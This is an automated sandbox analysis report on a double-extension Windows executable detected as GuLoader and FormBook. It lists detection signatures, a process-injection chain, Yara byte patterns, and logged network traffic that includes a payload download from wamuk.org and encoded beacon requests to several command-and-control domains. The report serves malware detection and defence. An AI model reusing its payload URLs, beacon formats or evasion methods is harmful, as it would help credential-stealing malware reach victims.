Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
List of Items0001.doc.exe

Overview

General Information

Sample name:List of Items0001.doc.exe
Analysis ID:1516506
MD5:6d3da95a3e1f5861a54c30dd61f80c02
SHA1:74e6fb42c2de33b6b9dcd45aa86db1b99c8c2135
SHA256:9c2d1e2dc9170158a8fef8393fd58306f918ceb15701465c4e21040be94233c2
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • List of Items0001.doc.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\List of Items0001.doc.exe" MD5: 6D3DA95A3E1F5861A54C30DD61F80C02)
    • List of Items0001.doc.exe (PID: 8044 cmdline: "C:\Users\user\Desktop\List of Items0001.doc.exe" MD5: 6D3DA95A3E1F5861A54C30DD61F80C02)
      • MzAJhEkohQv.exe (PID: 3032 cmdline: "C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TapiUnattend.exe (PID: 1020 cmdline: "C:\Windows\SysWOW64\TapiUnattend.exe" MD5: D5BFFD755F566AAACB57CF83FDAA5CD0)
          • MzAJhEkohQv.exe (PID: 4076 cmdline: "C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7320 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)
          • explorer.exe (PID: 4960 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2baf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2baf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13b6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Suspicious Double Extension File Execution
        Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\List of Items0001.doc.exe", CommandLine: "C:\Users\user\Desktop\List of Items0001.doc.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\List of Items0001.doc.exe, NewProcessName: C:\Users\user\Desktop\List of Items0001.doc.exe, OriginalFileName: C:\Users\user\Desktop\List of Items0001.doc.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4960, ProcessCommandLine: "C:\Users\user\Desktop\List of Items0001.doc.exe", ProcessId: 3452, ProcessName: List of Items0001.doc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-09-24T11:25:42.306604+020028032702Potentially Bad Traffic192.168.11.3049892162.213.195.46443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: List of Items0001.doc.exeAvira: detected
        Multi AV Scanner detection for domain / URL
        Source: chalet-tofane.netVirustotal: Detection: 8%Perma Link
        Multi AV Scanner detection for submitted file
        Source: List of Items0001.doc.exeVirustotal: Detection: 9%Perma Link
        Source: List of Items0001.doc.exeReversingLabs: Detection: 13%
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.677676547145.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.677676641049.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.678884095238.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.678885673572.00000000038B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674222136638.0000000032330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.674223305013.0000000033380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: List of Items0001.doc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 162.213.195.46:443 -> 192.168.11.30:49892 version: TLS 1.2
        Source: List of Items0001.doc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: TapiUnattend.pdbGCTL source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678883923554.00000000010B8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MzAJhEkohQv.exe, 00000004.00000000.674131095770.0000000000CFE000.00000002.00000001.01000000.00000009.sdmp, MzAJhEkohQv.exe, 00000006.00000002.678885977938.0000000000CFE000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: List of Items0001.doc.exe, 00000003.00000003.674118248862.000000003248A000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674114276384.00000000322E0000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674206681805.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003A5D000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674210473415.000000000377C000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003930000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: List of Items0001.doc.exe, List of Items0001.doc.exe, 00000003.00000003.674118248862.000000003248A000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.000000003275D000.00000040.00001000.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000003.674114276384.00000000322E0000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674222220944.0000000032630000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674206681805.00000000035C3000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003A5D000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000003.674210473415.000000000377C000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000005.00000002.677676889684.0000000003930000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: List of Items0001.doc.exe, 00000003.00000001.673959496421.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: TapiUnattend.pdb source: List of Items0001.doc.exe, 00000003.00000002.674210019469.0000000002354000.00000004.00000020.00020000.00000000.sdmp, List of Items0001.doc.exe, 00000003.00000002.674209883406.0000000002334000.00000004.00000020.00020000.00000000.sdmp, MzAJhEkohQv.exe, 00000004.00000002.678883923554.00000000010B8000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

        Networking

        barindex
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.onetoph.xyz
        Source: DNS query: www.leadlikeyoumeanit.xyz
        Source: DNS query: www.moritynomxd.xyz
        Source: DNS query: www.inf30027group23.xyz
        Source: DNS query: www.inf30027group23.xyz
        Source: Joe Sandbox ViewIP Address: 62.149.128.40 62.149.128.40
        Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.30:49892 -> 162.213.195.46:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: GET /css/NxTelX253.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: wamuk.orgCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /4cb1/?7LY=XKNL1JD0m+kPKiRtwXvWadxi4lw/eMGyyubvbAiHS0Pw7N/QTVJnoSWf0VV+PqGNlgPtrFtsvm+9H+6jxRgj1ZWpayRlysea5sKDxNVo6arBefmKhfjh+4M=&Nze=C0klVT HTTP/1.1Host: www.brainchainllc.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /opa3/?7LY=//8N6NGdtRkn6yq8W3OBQnInDVkPrmeKzEa9OWHVIp2tO8AGOHzwJOfidi6bYHK8g9UFVHI1UtpxcaY/CfI8S9y/PcE6w9RcCLRpAW2RNdWqNgB6ObbfL00=&Nze=C0klVT HTTP/1.1Host: www.wdcb30.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /h5ax/?Nze=C0klVT&7LY=n2I933S2b2mTz9MH4ovHwta6aGzwDUSLbibwCM+kpCP4ce0V2B3v1/0mQi7obzyu6tSS6Xr/MEeQSasqmevZ/lWReC/hsjnmM5iDoTysJMz5ecITkOwwomo= HTTP/1.1Host: www.onetoph.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT HTTP/1.1Host: www.52ywq.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /l390/?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s= HTTP/1.1Host: www.leadlikeyoumeanit.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM= HTTP/1.1Host: www.moritynomxd.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /tohg/?7LY=yjqzcBzk86gS97o1hEgN6leh0gqiWIOHs+n5cGEGjSIKUxpSNCnE5Wq2EyXzrtnAt0SEhBRJIzSMRq3CHi5k3dz0/t/HC6DV0cbuHslMoBzbtjkOL7N7Vc4=&Nze=C0klVT HTTP/1.1Host: www.new-wellness.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /ekqf/?7LY=/kxxO9I2Zn9CFnKuVCiRmYl7loL48a9gy2ZogM6oKxXZExQsRNG6tTBrzETHf9DgSWw7bkgf2Hzd7TUNthqLIFQo8IeMSZ2DAN9PXR2KJtcXc92xKDXLKag=&Nze=C0klVT HTTP/1.1Host: www.inf30027group23.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /0nxw/?Nze=C0klVT&7LY=VDKVBJOA/bMGRjznn6eSems8iPmcvcvRTGWcYhSAh5py0v568JrBANxwxTTdsJYxe+oQ5Y483kbsTgyvaPba2lIHlrlEYNvhYt1r/d+MJXUCRpniVK7bENg= HTTP/1.1Host: www.rmgltd.servicesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /xzdz/?7LY=x7lVHcpwtLz16okLmHbGfKRnF/5iwEEr5spHmAkItsijFFhieq0XEiVeqKHGapUsexCU+RCpmPC2tDMsopmhIEQEAKOTNNAbk8zRTxmj1zKzDn29d79Ldvk=&Nze=C0klVT HTTP/1.1Host: www.mfgarage.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /ytc6/?Nze=C0klVT&7LY=RYHehDtD4gH3OO31IF1CMhco/TkeBNw6MFMBy+BdKXE5DZh4a3B2rurujEnG5bf1mvjABP5LZTRjcv/BkHIagK+kDFYsdgHg6BKHRShVUN8HZR3SFfvrnus= HTTP/1.1Host: www.chalet-tofane.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /clto/?7LY=Qp1XfCdsz8OJJJz3TLMvRPkoQesp985Iik5z4QR2yU8MVGcZykeEfqsbCV0TqEvKQ9KXAOYCUdjrGVGtx/egw088kz0UgyxAMHlR0NaM1s+K0msQl8MqjSQ=&Nze=C0klVT HTTP/1.1Host: www.tracy.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /dq8w/?7LY=rsgRN2uYsqPg3Qo/YYYAeG4xg8L475vmQkQHQbPGwaKvYIbbYiGFBNgcl1Tl9BL7RarA80Sklr82mx1ZpdFfI7nWlECEwgJhN036ZdAkz4rYHuoxU1i8U5s=&Nze=C0klVT HTTP/1.1Host: www.prj81oqde1.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /vacs/?7LY=Nw81+Usn0fanr8WCjEPwkk6RKTBWBdcWh3ZdisqFiDj5qtm6fUSc5UPRHiDGmrqRFt3sYIjXu/E976BkZ2ULyaZi6O7ym0jmurwAsFjcKbC3uyaytRFMIWQ=&Nze=C0klVT HTTP/1.1Host: www.wdeb18.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /4cb1/?7LY=XKNL1JD0m+kPKiRtwXvWadxi4lw/eMGyyubvbAiHS0Pw7N/QTVJnoSWf0VV+PqGNlgPtrFtsvm+9H+6jxRgj1ZWpayRlysea5sKDxNVo6arBefmKhfjh+4M=&Nze=C0klVT HTTP/1.1Host: www.brainchainllc.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /opa3/?7LY=//8N6NGdtRkn6yq8W3OBQnInDVkPrmeKzEa9OWHVIp2tO8AGOHzwJOfidi6bYHK8g9UFVHI1UtpxcaY/CfI8S9y/PcE6w9RcCLRpAW2RNdWqNgB6ObbfL00=&Nze=C0klVT HTTP/1.1Host: www.wdcb30.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /h5ax/?Nze=C0klVT&7LY=n2I933S2b2mTz9MH4ovHwta6aGzwDUSLbibwCM+kpCP4ce0V2B3v1/0mQi7obzyu6tSS6Xr/MEeQSasqmevZ/lWReC/hsjnmM5iDoTysJMz5ecITkOwwomo= HTTP/1.1Host: www.onetoph.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT HTTP/1.1Host: www.52ywq.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /l390/?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s= HTTP/1.1Host: www.leadlikeyoumeanit.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM= HTTP/1.1Host: www.moritynomxd.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficHTTP traffic detected: GET /tohg/?7LY=yjqzcBzk86gS97o1hEgN6leh0gqiWIOHs+n5cGEGjSIKUxpSNCnE5Wq2EyXzrtnAt0SEhBRJIzSMRq3CHi5k3dz0/t/HC6DV0cbuHslMoBzbtjkOL7N7Vc4=&Nze=C0klVT HTTP/1.1Host: www.new-wellness.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
        Source: global trafficDNS traffic detected: DNS query: wamuk.org
        Source: global trafficDNS traffic detected: DNS query: www.brainchainllc.online
        Source: global trafficDNS traffic detected: DNS query: www.wdcb30.top
        Source: global trafficDNS traffic detected: DNS query: www.onetoph.xyz
        Source: global trafficDNS traffic detected: DNS query: www.52ywq.vip
        Source: global trafficDNS traffic detected: DNS query: www.leadlikeyoumeanit.xyz
        Source: global trafficDNS traffic detected: DNS query: www.useanecdotenow.tech
        Source: global trafficDNS traffic detected: DNS query: www.moritynomxd.xyz
